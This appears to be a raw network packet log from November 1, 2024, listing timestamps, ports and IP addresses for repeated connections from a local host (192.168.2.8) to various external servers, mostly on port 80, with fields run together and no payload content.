                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.474260092 CET5021780192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.479031086 CET805021747.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.479093075 CET805021747.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.699146032 CET805021654.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.699471951 CET5021680192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.705295086 CET805021654.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.705362082 CET5021680192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.730509043 CET5021880192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.735409975 CET805021818.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.735543013 CET5021880192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.735658884 CET5021880192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.735680103 CET5021880192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.741075039 CET805021818.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.741106033 CET805021818.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.568301916 CET805021818.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.572921038 CET5021880192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.578233957 CET805021818.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.578425884 CET5021880192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.653557062 CET5021980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.658755064 CET805021954.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.658829927 CET5021980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.658977032 CET5021980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.658999920 CET5021980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.663849115 CET805021954.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.664102077 CET805021954.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.944933891 CET805021747.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.945179939 CET5021780192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.950417042 CET805021747.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.950644970 CET5021780192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.147093058 CET5022080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.152055979 CET805022044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.155728102 CET5022080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.155874014 CET5022080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.155893087 CET5022080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.160777092 CET805022044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.160809040 CET805022044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.485285044 CET805021954.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.485443115 CET5021980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.491422892 CET805021954.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.491472960 CET5021980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.503602982 CET5022180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.508563042 CET805022118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.508627892 CET5022180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.508774996 CET5022180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.508862019 CET5022180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.513752937 CET805022118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.513767958 CET805022118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.804685116 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.806710958 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.811568975 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.883740902 CET805022718.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.884341955 CET5022780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.889637947 CET805022718.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.891767979 CET5022780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.904619932 CET5022980192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.909413099 CET805022944.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.910264969 CET5022980192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.910356045 CET5022980192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.910356045 CET5022980192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.915122986 CET805022944.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.915132999 CET805022944.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.955395937 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.961030960 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.965986967 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.190718889 CET8050228172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.193912029 CET5022880192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.193912029 CET5022880192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.197971106 CET5023080192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.198930025 CET8050228172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.202785969 CET8050230172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.205861092 CET5023080192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.205861092 CET5023080192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.205895901 CET5023080192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.211020947 CET8050230172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.211039066 CET8050230172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.604687929 CET805022944.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.607835054 CET5022980192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.613276958 CET805022944.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.613358021 CET5022980192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.621648073 CET5023180192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.626646996 CET805023113.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.626770020 CET5023180192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.626863956 CET5023180192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.626863956 CET5023180192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.631618977 CET805023113.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.631642103 CET805023113.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.867052078 CET8050230172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.867177963 CET5023080192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.867177963 CET5023080192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.872051001 CET8050230172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.894057989 CET5023280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.898998022 CET805023218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.899708986 CET5023280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.960627079 CET5023280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.960664988 CET5023280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:57.210889101 CET805023218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:57.210939884 CET805023218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.073182106 CET805023113.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.073462009 CET5023180192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.079067945 CET805023113.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.079184055 CET5023180192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.091389894 CET5023380192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.096282005 CET805023335.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.096525908 CET5023380192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.096613884 CET5023380192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:04.921349049 CET805023934.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:04.921639919 CET5023980192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:04.927386045 CET805023934.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:04.927442074 CET5023980192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:04.938157082 CET5024080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:04.943190098 CET805024018.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:04.943259001 CET5024080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:04.943387985 CET5024080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:04.943401098 CET5024080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:04.948203087 CET805024018.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:04.948214054 CET805024018.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:05.617506981 CET805024018.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:05.618220091 CET5024080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:05.624087095 CET805024018.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:05.624164104 CET5024080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:05.640558004 CET5024180192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:05.645433903 CET805024135.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:05.645528078 CET5024180192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:05.645647049 CET5024180192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:05.645690918 CET5024180192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:05.650576115 CET805024135.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:05.650588989 CET805024135.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:06.506182909 CET805024135.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:06.511250973 CET5024180192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:06.516494036 CET805024135.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:06.516575098 CET5024180192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:06.675539970 CET5024280192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:06.680483103 CET805024234.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:06.681832075 CET5024280192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:06.681953907 CET5024280192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:06.682005882 CET5024280192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:06.686791897 CET805024234.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:06.686804056 CET805024234.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:06.833442926 CET805023482.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:06.833508968 CET5023480192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:06.833580971 CET5023480192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:06.837198019 CET5024380192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:06.838373899 CET805023482.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:06.842046976 CET805024382.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:06.842120886 CET5024380192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:06.842298985 CET5024380192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:06.842325926 CET5024380192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:06.847043991 CET805024382.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:06.847073078 CET805024382.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:07.049546003 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:07.054461956 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:07.205863953 CET5024280192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:07.207204103 CET5024480192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:07.212356091 CET805024434.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:07.212425947 CET5024480192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:07.212928057 CET5024480192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:07.212941885 CET5024480192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:07.217937946 CET805024434.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:07.217966080 CET805024434.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:07.319657087 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:07.321142912 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:07.326050997 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:08.073621035 CET805024434.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:13.996304989 CET805623847.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:13.996320009 CET805623847.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:15.326344967 CET805024382.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:15.326432943 CET5024380192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:15.326570034 CET5024380192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:15.331402063 CET805024382.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:15.343519926 CET5623980192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:15.348496914 CET805623982.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:15.348601103 CET5623980192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:15.352904081 CET5623980192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:15.352936029 CET5623980192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:15.357790947 CET805623982.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:15.357897997 CET805623982.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:15.449184895 CET805623847.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:15.449441910 CET5623880192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:15.454576015 CET805623847.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:15.455148935 CET5623880192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:15.463812113 CET5624080192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:15.468681097 CET805624054.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:15.469413996 CET5624080192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:15.469562054 CET5624080192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:15.469582081 CET5624080192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:15.474816084 CET805624054.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:15.474845886 CET805624054.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:16.315403938 CET805624054.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:16.315584898 CET5624080192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:16.321084023 CET805624054.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:16.321190119 CET5624080192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:16.331968069 CET5624180192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:16.337037086 CET80562413.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:16.337107897 CET5624180192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:16.337296963 CET5624180192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:16.337358952 CET5624180192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:16.342278004 CET80562413.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:16.342397928 CET80562413.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:16.997170925 CET80562413.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:16.998284101 CET5624180192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:17.003849030 CET80562413.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:17.006730080 CET5624180192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:17.012257099 CET5624280192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:17.017054081 CET805624218.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:17.018693924 CET5624280192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:17.018862009 CET5624280192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:17.018862009 CET5624280192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:17.024462938 CET805624218.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:17.024485111 CET805624218.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:17.682527065 CET805624218.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:17.685497046 CET5624280192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:17.691056013 CET805624218.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:17.691206932 CET5624280192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:18.044841051 CET5624380192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:18.049901009 CET805624318.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:18.049966097 CET5624380192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:18.050203085 CET5624380192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:18.050234079 CET5624380192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:18.055128098 CET805624318.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:18.055159092 CET805624318.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:18.885251999 CET805624318.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:23.837364912 CET805623982.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:23.839740038 CET5623980192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:23.839783907 CET5623980192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:23.841559887 CET5625180192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:23.844656944 CET805623982.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:23.846465111 CET805625182.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:23.846544027 CET5625180192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:23.850435972 CET5625180192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:23.850435972 CET5625180192.168.2.882.112.184.197
